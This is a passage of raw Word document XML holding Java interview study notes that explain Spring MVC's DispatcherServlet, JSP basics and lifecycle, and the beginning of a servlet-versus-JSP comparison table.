          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="404" w:name="_Toc197867618"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is a dispatcher servlet?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="404"/>
    </w:p>
    <w:p w14:paraId="511E9E90" w14:textId="633B1C96" w:rsidR="0038563B" w:rsidRPr="001B573F" w:rsidRDefault="0038563B"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in Spring MVC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB5DCE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is the </w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>front controller</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the </w:t>
      </w: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architecture. It handles all incoming HTTP requests and routes them to the appropriate </w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>controllers</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E915B6"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4D120">
          <v:rect id="_x0000_i1920" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F2C800"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Lifecycle (High-Level Flow)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DEF7C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HTTP request</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → /some-path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1788CFF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Request hits the </w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>DispatcherServlet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="769EDB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uses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matching controller</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47585E4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s the controller’s method (e.g., @GetMapping, @PostMapping)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24257F1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Controller returns a </w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ModelAndView</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D888EA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passes the model to the </w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ViewResolver</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD4C66E"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 (like JSP, Thymeleaf, JSON) is rendered and sent back to the client</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FCD1AD1"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97A5A6">
          <v:rect id="_x0000_i1921" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A8A87E3"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How it Works Internally</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F8BDFA3"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gistered in web.xml (legacy)</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>auto-configured in Spring Boot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="440F57B1"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tercepts requests based on URL pattern like / or /api/*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA3F539"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orks with components like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C034FF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Finds the appropriate controller</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="261FA2C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HandlerAdapter – Invokes the controller method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B48370"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Resolver – Resolves logical view names into actual views (e.g., JSP page)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76231CAD"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A8FE0">
          <v:rect id="_x0000_i1922" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C101381"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Think of it as:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC9230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w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>traffic cop</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that receives all web requests and </w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>dispatches</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> them to the appropriate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processes the result, and renders the final response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7252150A"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E2B31">
          <v:rect id="_x0000_i1923" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="51FE1BBD"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 (Spring Boot):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C7B0C49"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Controller</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37931234"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estMapping("/hello")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202E2BE2"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26565286" w14:textId="77777777" w:rsidR="0038563B" w:rsidRPr="001B573F" w:rsidRDefault="0038563B" w:rsidP="001B573F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58A894D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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5663558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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD5BA58"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Hello, Siddhant!";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="115A9DAF"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5C6002A3"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6A520CA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the request comes to /hello,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takes care of routing it to sayHello() method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68BCD3B6" w14:textId="77777777" w:rsidR="0038563B" w:rsidRPr="00CE4B95"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24" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="111457B2" w14:textId="21D06D9C" w:rsidR="00502122" w:rsidRPr="00CE4B95" w:rsidRDefault="009E74CB">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="405" w:name="_Toc197867619"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is JSP</w:t>
      </w:r>
      <w:r w:rsidR="00502122" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="405"/>
    </w:p>
    <w:p w14:paraId="15BEE930" w14:textId="7852EC6B" w:rsidR="00F363B4" w:rsidRPr="001B573F" w:rsidRDefault="00F363B4"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JSP?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5804833E"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 (JavaServer Pages)</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a </w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>server-side technology</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> used to create </w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>dynamic web pages</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Java-based web applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="402BD331"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s basically </w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>HTML + Java</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, where you can embed Java code inside special JSP tags to dynamically generate content.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C51C754"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DD537">
          <v:rect id="_x0000_i1925" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1858DB21"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Key Features of JSP:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23DB2CF9"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r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> .jsp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A5917D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uns on:</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Servlet Container (like Apache Tomcat)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F43C3E"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ed into:</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Servlet (yes, internally JSP is converted to a servlet class!)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B7E5A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sed for:</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Displaying dynamic content like user dashboards, tables, forms, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F1E3F3"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98E19">
          <v:rect id="_x0000_i1926" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C2C88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Basic Syntax Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4893C892"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68826799"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ead&gt;&lt;title&gt;JSP Example&lt;/title&gt;&lt;/head&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DCD3B4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75675BA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lt;%= request.getParameter("name") %&gt;!&lt;/h1&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1933AEC6"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EC48FB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05CA1249"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 ... %&gt; is used to output Java expressions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="342C33FE"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use scriptlets &lt;% ... %&gt;, expressions, or directives.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED356F7"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DD3D4E">
          <v:rect id="_x0000_i1927" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CBC045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like Servlet):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43FF69C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ion:</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> JSP → Servlet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="388AC267"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pilation:</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Servlet compiled to .class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E50B698"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oading:</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Loaded into memory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3979C281"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r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Handles requests using service() method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F27AE2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stroy:</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> When container shuts down or class is unloaded</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0051A9A0"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85CC92">
          <v:rect id="_x0000_i1928" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E5183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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ADF05EC"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ier and faster than writing full Java servlets for simple UI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28F2EDFA"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ws mixing static HTML with dynamic Java code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA04EFD"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MVC (used in View layer)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4302F81B"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060B55">
          <v:rect id="_x0000_i1929" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F5067D"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advantages (Why it’s less used today):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A06CBB7"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Mixing Java and HTML can get messy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C21150"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Not ideal for large-scale UI — modern apps prefer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Angular</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D1ED7C6"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D6CF5">
          <v:rect id="_x0000_i1930" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="734872C3"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Use Case:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D679DA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traditional Spring MVC apps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B175C0B"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 returns ModelAndView("home")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A32E610"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ome.jsp renders the UI using the model data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB0EC5F" w14:textId="77777777" w:rsidR="00F363B4" w:rsidRPr="00CE4B95"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31" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="259A13D9" w14:textId="30C97F98" w:rsidR="00502122" w:rsidRPr="00CE4B95" w:rsidRDefault="009E74CB">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="406" w:name="_Toc197867620"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the difference between servlet and JSP</w:t>
      </w:r>
      <w:r w:rsidR="00502122" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="406"/>
    </w:p>
    <w:p w14:paraId="588DFE96" w14:textId="40B03FAE" w:rsidR="00176D44" w:rsidRPr="00CE4B95"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315"/>
        <w:gridCol w:w="4382"/>
      </w:tblGrid>
      <w:tr w:rsidR="001B573F" w:rsidRPr="001B573F" w14:paraId="68149A81" w14:textId="77777777" w:rsidTr="00176D44">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="16605E69"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Feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0A12ADC0"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ervlet</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="09A05CCB"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JSP (JavaServer Pages)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001B573F" w:rsidRPr="001B573F" w14:paraId="00EC6662" w14:textId="77777777" w:rsidTr="00176D44">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="797840FE"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finition</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1562535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lass that handles HTTP requests/responses</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7823652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page with embedded Java code for dynamic content</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001B573F" w:rsidRPr="001B573F" w14:paraId="3A66091F" w14:textId="77777777" w:rsidTr="00176D44">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="08206F9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rpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5F65608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control logic</w:t>
            </w:r>
            <w:r w:rsidRPr="001B573F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> (backend logic)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4F34DF4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presentation logic</w:t>
            </w:r>
            <w:r w:rsidRPr="001B573F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> (UI rendering)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001B573F" w:rsidRPr="001B573F" w14:paraId="54EC6739" w14:textId="77777777" w:rsidTr="00176D44">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7778C6C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de Style</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6F6F667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re Java code</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
